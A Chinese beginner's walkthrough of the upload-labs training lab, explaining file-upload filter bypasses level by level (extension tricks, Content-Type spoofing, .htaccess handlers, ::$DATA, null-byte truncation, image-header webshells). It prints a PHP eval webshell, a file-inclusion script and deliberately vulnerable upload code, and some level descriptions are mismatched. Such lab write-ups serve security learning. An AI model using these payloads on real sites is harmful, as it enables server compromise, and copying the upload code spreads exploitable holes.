upload-labs初学者通关详解

2023-10-27

Pass-1 js验证绕过

首先在开始之前我们需要在我们导入的upload-labs文件里面新建一个文件夹,方便我们上传php文件

 

打开第一关我们可以看见这个页面

 

我们将事先准好好的一句话木马文件传上去

可以看到提示,文件夹格式不正确

 

这时候我们要判断他判断文件代码后缀是在前段还是后端

我们可以查看第一关的文件代码,会发现有一个checkFile()函数,(在浏览器的元素审查中找文件上传的js代码可以看到)

这个函数就是检查文件后缀的,我们可以删除这个函数再上传可以成功。(这里不演示了)

给大家演示一下另一种方法,就是用burp抓包

  1. 先将文件后缀修改成可以传入的格式。
  2. 然后点击上传,抓包,在burp里面修改文件后缀名。
  3. 上传成功。

 

 

 

最后文件上传就可以成功了

用蚁剑或者其他工具连接上传的php文件就可以了。

 

到这里第一关就算完成。成功获得webshell。

(不会蚁剑的可以上网自己学一下)

Pass-2 MIME验证绕过

遇到的问题和上一关一样,无法直接上传

我们查看源码,

s_upload = false;

$msg = null;

if (isset($_POST['submit'])) {

    if (file_exists($UPLOAD_ADDR)) {

        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {

            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {

                $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];

                $is_upload = true;



            }

        } else {

            $msg = '文件类型不正确,请重新上传!';

        }

    } else {

        $msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';

    }

}

可以发现他只对content-type进行判断,我们就可以利用burp抓包对content-type进行修改

 

只需要对这个格式判断进行修改,改成满足条件的image/jpeg就可以了

 

上传成功,获取webshell

Pass-3黑名单绕过

第三关一样的先看源码

$is_upload = false;

$msg = null;

if (isset($_POST['submit'])) {

    if (file_exists($UPLOAD_ADDR)) {

        $deny_ext = array('.asp','.aspx','.php','.jsp');

        $file_name = trim($_FILES['upload_file']['name']);

        $file_name = deldot($file_name);//删除文件名末尾的点

        $file_ext = strrchr($file_name, '.');

        $file_ext = strtolower($file_ext); //转换为小写

        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

        $file_ext = trim($file_ext); //收尾去空



        if(!in_array($file_ext, $deny_ext)) {

            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR. '/' . $_FILES['upload_file']['name'])) {

                 $img_path = $UPLOAD_ADDR .'/'. $_FILES['upload_file']['name'];

                 $is_upload = true;

            }

        } else {

            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';

        }

    } else {

        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';

    }

}

可以看到这一关是不允许上传.asp,.aspx,.php,.jsp后缀文件

索然做了黑名单验证,但是我们可以通过其他形式绕过,比如.php、.phtml、.phps、.php5、.pht等类似的格式来绕过。

我们这里利用burp抓包对filename="3.php"进行修改

改为filename="3.php3"

 

这样就可以上传成功

但是成功以后.php3的后缀无法与工具实现连接

我们还需在Apache的httpd.conf中配置以下的代码

AddType application/x-httpd-php .php .phtml .phps .php5 .pht .php3

Pass-4.htaccess绕过

如表题所说,我们需要先了解一下htaccess文件

htaccess

  

.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

本关禁止上传.php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf等后缀文件

但是他没有禁止.htaccess文件,我们就可以利用htaccess文件来工作

先写一个.htaccess文件

<FilesMatch "4.jpg(即将上传的文件名)">

SetHandler application/x-httpd-php

</FilesMatch>

这段话的意思就是不管文件是什么样子,只要包含4.jpg就会被看做php文件来执行。

 

上传成功,我们再上传图片木马即可

可以测试一下,看是否连接成功

Pass-5大小写绕过

先查看提示和网页源码

$is_upload = false;

$msg = null;

if (isset($_POST['submit'])) {

    if (file_exists($UPLOAD_ADDR)) {

        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

        $file_name = trim($_FILES['upload_file']['name']);

        $file_name = deldot($file_name);//删除文件名末尾的点

        $file_ext = strrchr($file_name, '.');

        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

        $file_ext = trim($file_ext); //首尾去空



        if (!in_array($file_ext, $deny_ext)) {

            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {

                $img_path = $UPLOAD_ADDR . '/' . $file_name;

                $is_upload = true;

            }

        } else {

            $msg = '此文件不允许上传';

        }

    } else {

        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';

    }

}

这一关和上一关差不多,只不过这一关加上了对.htaccess的禁止,但是没有将后缀进行大小写统一

我们用burp抓包将filename="5.php"改为filename="5.PHP"就可以了

 

 

上传成功

Pass-6空格绕过

 

看完提示发现和源码,可以看到上面的方法都不可行

这时候就需要普及一个知识:Win下xx.jpg空格和xx.jpg.两种文件是不被允许存在的,要是这样命名文件,windows系统会默认删除空格或者.

在这里系统默认删除的的文件中的.

所以我们用burp抓包将filename="6.php"改为filename="6.php "(6.php空格)

 

Pass-7 点绕过

 

s_upload = false;

$msg = null;

if (isset($_POST['submit'])) {

    if (file_exists($UPLOAD_ADDR)) {

        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

        $file_name = trim($_FILES['upload_file']['name']);

        $file_ext = strrchr($file_name, '.');

        $file_ext = strtolower($file_ext); //转换为小写

        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

        $file_ext = trim($file_ext); //首尾去空

        

        if (!in_array($file_ext, $deny_ext)) {

            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {

                $img_path = $UPLOAD_ADDR . '/' . $file_name;

                $is_upload = true;

            }

        } else {

            $msg = '此文件不允许上传';

        }

    } else {

        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';

    }

分析代码,有去空格和所以黑名单,但是没有去点。

我们只需要利用burp抓包加个点即可

 

这里加个点就好。

Pass-8 ::$DATA绕过

 源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

分析源码可知,之前所有的点这关都有防范

NTFS文件系统包括对备用数据流的支持。这不是众所周知的功能,主要包括提供与Macintosh文件系统中的文件的兼容性。备用数据流允许文件包含多个数据流。每个文件至少有一个数据流。在Windows中,此默认数据流称为:$ DATA。

本关中的黑名单没有去处后缀名中的“::$DATA”

利用burp抓包,在文件后缀处加上::$DATA

 

本关结束

Pass-9 .空格.绕过

本pass只允许上传.jpg|.png|.gif后缀的文件!

源码

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        }
        else{
            $msg = "上传失败";
        }
    }
    else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

我们可以看到这关和上一关基本相似,只不过save_path变成了POST

我们仍然使用上一关一样的原理

而在POST数据里面,由于POST里面的数据不会被url自动解码,所以要稍微改变一下

 

对这两处进行修改

后缀名改为jpg

我们先给做个标记,我这里使用+

 任何修改+的值改为00

 

Burp版本不一样改的地方也不一样,不一样的可以自己上网百度

任何就可以上传成功

Pass-13图片木马绕过

本pass检查图标内容开头2个字节!

查看源码

function getReailFileType($filename){

    $file = fopen($filename, "rb");

    $bin = fread($file, 2); //只读2字节

    fclose($file);

    $strInfo = @unpack("C2chars", $bin);    

    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    

    $fileType = '';    

    switch($typeCode){      

        case 255216:            

            $fileType = 'jpg';

            break;

        case 13780:            

            $fileType = 'png';

            break;        

        case 7173:            

            $fileType = 'gif';

            break;

        default:            

            $fileType = 'unknown';

        }    

        return $fileType;

}



$is_upload = false;

$msg = null;

if(isset($_POST['submit'])){

    $temp_file = $_FILES['upload_file']['tmp_name'];

    $file_type = getReailFileType($temp_file);



    if($file_type == 'unknown'){

        $msg = "文件未知,上传失败!";

    }else{

        $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$file_type;

        if(move_uploaded_file($temp_file,$img_path)){

            $is_upload = true;

        }

        else{

            $msg = "上传失败";

        }

    }

}

本关比较复杂

先写一个php文件放在源文件里面

 

##include.php
<?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
    include $file;
}else{
    show_source(__file__);
}
?>

然后需要做一个图片码,自己制作也行也可以直接写

直接写就是

GIF 89A

   <?php @eval($_POST['pass']);?>

的php文件

然后直接将图片码上传即可

然后用工具连接的时候需要用我们刚开始写的php文件解析一下

简单来说就是访问图片的时候需要这样子访问

upload/include.php?file=upload/图片名称

然后就可以用工具连接,不然会报错连接不成功

Pass-14 getimagesize(突破)

本关和上一关差不多

看源码

function isImage($filename){

    $types = '.jpeg|.png|.gif';

    if(file_exists($filename)){

        $info = getimagesize($filename);

        $ext = image_type_to_extension($info[2]);

        if(stripos($types,$ext)){

            return $ext;

        }else{

            return false;

        }

    }else{

        return false;

    }

}



$is_upload = false;

$msg = null;

if(isset($_POST['submit'])){

    $temp_file = $_FILES['upload_file']['tmp_name'];

    $res = isImage($temp_file);

    if(!$res){

        $msg = "文件未知,上传失败!";

    }else{

        $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").$res;

        if(move_uploaded_file($temp_file,$img_path)){

            $is_upload = true;

        }

        else{

            $msg = "上传失败";

        }

    }

}

这一关是用getimagesize函数来判断文件类型,但是还是可以用图片码绕过

13关同样的方放也可以绕过

Pass15 exif_imagetype()突破

   本pass使用exif_imagetype()检查是否为图片文件!

查看源码

function isImage($filename){

    //需要开启php_exif模块

    $image_type = exif_imagetype($filename);

    switch ($image_type) {

        case IMAGETYPE_GIF:

            return "gif";

            break;

        case IMAGETYPE_JPEG:

            return "jpg";

            break;

        case IMAGETYPE_PNG:

            return "png";

            break;    

        default:

            return false;

            break;

    }

}



$is_upload = false;

$msg = null;

if(isset($_POST['submit'])){

    $temp_file = $_FILES['upload_file']['tmp_name'];

    $res = isImage($temp_file);

    if(!$res){

        $msg = "文件未知,上传失败!";

    }else{

        $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$res;

        if(move_uploaded_file($temp_file,$img_path)){

            $is_upload = true;

        }

        else{

            $msg = "上传失败";

        }

    }

}

我们分析源码,

第1行检测$fileext和$filetype是否为gif格式。

然后3行使用move_uploaded_file函数来做判断条件,如果成功将文件移动到$target_path,就会进入二次渲染的代码,反之上传失败。

看到了exif_imagetype,利用php_exif来判断文件类型,用图片马绕过,方法同PASS-13

Pass16 图片渲染

这一关是二次渲染,我们刚开始上传的图片会被渲染,导致原有的属性被改变,我们首先上传一张gif的图片

存到其他地方(这时的图片已经被渲染了)可以用它去制作图片马来进行上传。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

upload-labs初学者通关详解 的相关文章

  • upload-labs pass1-9

    目录 pass 01 JS绕过 pass 02 content type绕过 pass 03部分黑名单绕过 pass 04 htaccess绕过 pass 05 user ini绕过 绕过 点空格点绕过 pass 06 大小写绕过 pass
  • upload-labs上传漏洞靶场--pass1,2,11,12,17

    upload labs上传漏洞靶场 1 pass 1改变文件后缀名 新建一句话木马文件 并上传 发现 php文件上传失败 只能使用图片上传 我们修改 php文件的后缀名为 jpg上传 并使用burp抓包 将 jpg修改成 php后 关闭拦截
  • upload-labs初学者通关详解

    Pass 1 js验证绕过 首先在开始之前我们需要在我们导入的upload labs文件里面新建一个文件夹 方便我们上传php文件 打开第一关我们可以看见这个页面 我们将事先准好好的一句话木马文件传上去 可以看到提示 文件夹格式不正确 这时
  • upload-labs靶场通关指南(第1-3关)

    今天继续给大家介绍渗透测试相关知识 本文主要内容是upload labs靶场通关指南 第1 3关 免责声明 本文所介绍的内容仅做学习交流使用 严禁利用文中技术进行非法行为 否则造成一切严重后果自负 再次强调 严禁对未授权设备进行渗透测试 一
  • upload-labs pass10-14

    pass 10 绕过 点空格点绕过 查看源码 这是一个后端黑名单检查 str ireplace 的作用是寻找文件名中存在的黑名单字符 上传一个php文件 查看提示 可以把PHP文件后缀名改为可以上传的文件类型 上传成功 pass 11 双写
  • 文件上传漏洞upload-libs pass5

    文件上传漏洞upload libs pass4 首先查看源码 无法使用空格和大小写绕过 且黑名单过滤了 htaccess 查看提示 利用readme php文件 因为没有过滤ini文件 创建 text ini和一句话木马文件 内容为 aut
  • upload-labs 第6-20关

    upload labs关数6 20 第6关 第7关 第8关 第9关 第10关 第11关 第12关 第13关 第14关 第15关 第16关 第17关 第18关 第19关 这几关都是特殊的绕过检测方式 第6关 第六关其实没什么思路 就是对比了一
  • 文件上传upload-labs第十一至十九关

    第十一关 白名单 get类型 00截断 需要两个条件 php版本小于5 3 4 php的magic quotes gpc为OFF状态 另save path等于下面的值 upload 4 php 00 BP修改一下抓到的包 第十二关 POST
  • 文件上传漏洞upload-libs pass2

    文件上传漏洞upload libs pass2 首先查看源码 发现是后端PHP过滤 仅允许类型为image jpeg image png image gif的文件上传 将一句话木马的后缀改为jpg 上传图片并抓包 Send to Repea
  • upload-labs文件上传漏洞(Pass-01~Pass-21)

    目录 pass 1 js前端绕过 pass 2 MiMe绕过 pass 3 黑名单绕过 pass 04 htaccess文件上传 pass 05 pass 06 大小写绕过 pass 07 空格绕过 pass 08 windows特性加点绕
  • BUUCTF做题Upload-Labs记录pass-01~pass-10

    BUUCTF做题Upload Labs记录pass 01 pass 10 pass 01 前端验证后缀 传1 png 抓包改1 php 即可 蚁剑连 http your ip upload 1 php pass 02 验证content t
  • Uploads-labs靶场练习记录8、9、10-绕过服务端检测(文件后缀)

    这是第八关 1 提示显示不可以上传所有可解析的后缀 那就用png配合htaccess转换php吧 2 成功 这是第九关 1 修改大小写发现还是不能上传 2 后缀加上 DATA上传 成功 这是第十关 1 尝试修改为filename phpin
  • upload(pass01~pass09)

    文章目录 Pass 01 Pass 02 Pass 03 Pass 04 未解决 Pass 05 失败 自己的一些尝试 后续 Pass 06 Pass 07 Pass 08 Pass 09 Pass 01 先查看提示 在客户端使用JS对图片
  • upload-labs 环境搭建(docker)

    1 切换到root用户 2 在docker镜像仓库搜索upload labs镜像 3 下载镜像 4 查看本地镜像库 看是否下载成功 如下图就有了下载的镜像 5 运行镜像 生成镜像 docker run d p92 80 镜像id 92端口是
  • 文件上传之.htaccess绕过黑名单——upload-labs靶场第四关

    今天继续给大家介绍渗透测试相关知识 本文主要内容是介绍 htaccess绕过黑名单的文件上传方法 并借助upload labs靶场的第四关进行了实战 免责声明 本文所介绍的内容仅做学习交流使用 严禁利用文中技术进行非法行为 否则造成一切严重
  • 文件上传漏洞靶场upload-labs学习(pass11-pass15)

    Upload Labs关卡 0x00 Pass11 str ireplace复写绕过 0x01 Pass12 GET方式 00截断 0x02 Pass13 POST方式 00截断 0x03 Pass14 文件头截取判断 0x04 Pass1
  • 文件上传漏洞upload-libs pass13

    文件上传漏洞upload libs pass13 查看源代码 发现是POST 00截断 Burp抓包 Ctrl R 如图修改上传路径 在上传路径中将 的hex改为00 即 Go 成功 发现文件路径 测试一下 成功
  • 文件上传漏洞靶场upload-labs学习(pass1-pass5)

    Upload Labs学习 0x00 upload labs简介 0x01 upload labs环境搭建 0x02 Pass1 前端判断绕过 0x03 Pass2 content type类型绕过 上传测试 源代码阅读 0x04 Pass
  • upload-labs通关(Pass-11~Pass-15)

    目录 Pass 11 Pass 12 Pass 13 Pass 14 Pass 15 Pass 11 什么鬼 我都做好了上传不成功的准备 结果sh php居然上传成功了 一看Response报文 果然事情没有这么简单 后端自动把文件名中的p
  • upload-labs通关(Pass-06~Pass-10)

    目录 Pass 06 Pass 07 Pass 08 Pass 09 Pass 10 Pass 06 上传sh php失败 burp中将抓到的包send to repeater 修改filename为sh xxx发现可以上传成功 说明是黑名

随机推荐

  • 单片机--USART

    目录 1 通信的基础知识 2 USART 3 串口通信协议 4 相关寄存器 串口控制寄存器 波特率寄存器 中断和状态寄存器 编辑 数据发送寄存器 数据接收寄存器 5 USART功能框图 6 串口发送实验 实验要求 1 观察实物 2 分析原理
  • 路由与路由表简介

    路由的概念 从字面上来说 路由 就是路径选择的意思 路由是指网络设备通过网络将信息正确传输到指定目的地的方式 而路由器正是这样的 网络设备 它可以根据目标网络选择 最优 的路径来决定下一跳跳向哪个路由器 但是什么是最优的路径 最优并不意味着
  • Go语言网络编程(socket编程)TCP粘包

    1 TCP粘包 服务端代码如下 socket stick server main go func process conn net Conn defer conn Close reader bufio NewReader conn var
  • 12306登录验证码识别

    最近在研究12306验证码识别 前期的12306查询验证码识别已经上线了 详见http download csdn net download ghost man 10160932的博客 里面的12306查询验证码已经上线了 可以去体验一下
  • linux服务器前后端部署遇到的问题以及解决办法

    nginx部署前端 将静态资源打包上传到自己指定的目录 nginx 配置 到这里 前端就部署完成了 当时访问的时候发现只能加载html页面 所有的js css 图片等等全部404 原因是没有指定静态资源的绝对路径 因为我用的宝塔面板的ngi
  • 如何添加Burp Suite添加https证书

    Burp Suite是一款强大的安全测试工具 可以用来设置代理 抓取http数据包 如果添加了https证书 就可以抓取https数据包 一 前期准备 联网的电脑一台 Burp Suite软件 firefox浏览器 并安装proxy swi
  • 第1195期机器学习日报(2017-12-26)

    机器学习日报 2017 12 26 Moments in Time IBM MIT联合提出最新百万规模视频动作理解数据集 ChatbotsChina 2017深度学习框架大事记 wx SWATS 自动由Adam切换为SGD而实现更好的泛化性
  • HTML与计算机代码

    目录 计算机代码 HTML 计算机代码格式 HTML 键盘格式 实例 HTML 样本格式 实例 HTML 代码格式 实例 实例 实例 HTML 变量格式化 实例 HTML 计算机代码元素 一个完整的实例 计算机代码 var person f
  • 2023年第十四届蓝桥杯单片机开放与设计省赛微析与经验分享

    前言 2023年4月8日 就在昨天 本人刚参与了第十四届蓝桥杯单片机开放与设计省赛 整体做下来 且不谈客观题 今年的程序题 个人感觉有点像大杂烩 题量大 细节多 而且有些要求定义不够清晰 所以本人这次做的不够完美 并且因为时间问题有些小功能
  • 教妹学Java(七):究竟什么是JVM?

    大家好 我是沉默王二 一个和黄家驹一样身高 和刘德华一样颜值的程序员 本篇文章通过我和三妹对话的形式来谈一谈 究竟什么是 JVM 教妹学 Java 没见过这么有趣的标题吧 语不惊人死不休 没错 本篇文章的标题就是这么酷炫 接受不了的同学就别
  • 30天自制操作系统第3天harib00g

    30天自制操作系统 第3天进入32位模式并导入 C 语言 确认操作系统的执行情况 harib00g 准备材料 windows环境 VMware Workstation Visual Studio Code 程序和源代码 https pan
  • openmmlab第五次作业

    MMDetection是商汤和港中文大学针对目标检测任务推出的一个开源项目 它基于Pytorch实现了大量的目标检测算法 把数据集构建 模型搭建 训练策略等过程都封装成了一个个模块 通过模块调用的方式 我们能够以很少的代码量实现一个新算法
  • 解封装(七):av_read_frame读取帧数据函数分析和产生的空间问题分析,以及AVPacket分析

    1 在完成了视频的格式的解析 即音视频编码参数获取之后 我们就可以开始读取具体的音视频帧数据 av read frame 我们要忠实的是 函数调用之后是否应该涉及到清理方法 先看下上面函数的参数 AVFormatContext s 文件格式
  • hadoop之yarn

    简介 一 YARN是一个通用资源管理系统和调度平台 为集群在利用率 资源统一管理和数据共享等方面带来了巨大好处 1 通用指不仅支持mr程序 也支持其它计算程序 2 资源管理包括集群的硬件资源 cpu 内存等 3 调度平台指多个程序同时执行时
  • 反向题在测试问卷信效度_九种方法筛选无效问卷及对研究设计的启示

    引言 随着网络及智能手机的普及 传统的一些纸笔测验渐渐被网络问卷所替代 网络问卷由于其便捷性 很大程度上方便了研究者和被试 2018年JOM一篇文章发现越来越多的研究者开始使用网络问卷收集数据 相关发表的文章也呈现逐年增加的趋势 参见Por
  • Linux——进程优先级

    1 什么是优先级 优先级和权限息息相关 权限的含义为能还是不能做这件事 而优先级则表示 你有权限去做 只不过是先去做还是后去做这件事罢了 2 为什么会存在优先级 优先级表明了狼多肉少的理念 举个例子 在日常生活中我们进行排队看医生 队列就是
  • CSDN如何转载别人的文章(快速转载)

    1 找到要转载的文章 用chrome浏览器打开 右键选择检查 2 在chrome中下方的框里找到对应的内容 html脚本中找到对应的节点 article content 选中节点 网页上被选中内容会被高亮显示 然后右键菜单选中 Copy g
  • gcc -l参数和-L参数

    l参数和 L参数 l参数就是用来指定程序要链接的库 l参数紧接着就是库名 那么库名跟真正的库文件名有什么关系呢 就拿数学库来说 他的库名是m 他的库文件名是libm so 很容易看出 把库文件名的头lib和尾 so去掉就是库名了 好了现在我
  • 查询引擎中的代码生成技术

    目录 一 背景 二 相关知识 2 1 Java虚拟机规范 2 1 1 数据类型 2 1 2 字节码指令 2 1 3 class文件格式 2 2 虚函数与CPU预测 2 3 查询引擎 火山模型 三 代码生成工具 3 1 动态编译器Janino
  • upload-labs初学者通关详解

    Pass 1 js验证绕过 首先在开始之前我们需要在我们导入的upload labs文件里面新建一个文件夹 方便我们上传php文件 打开第一关我们可以看见这个页面 我们将事先准好好的一句话木马文件传上去 可以看到提示 文件夹格式不正确 这时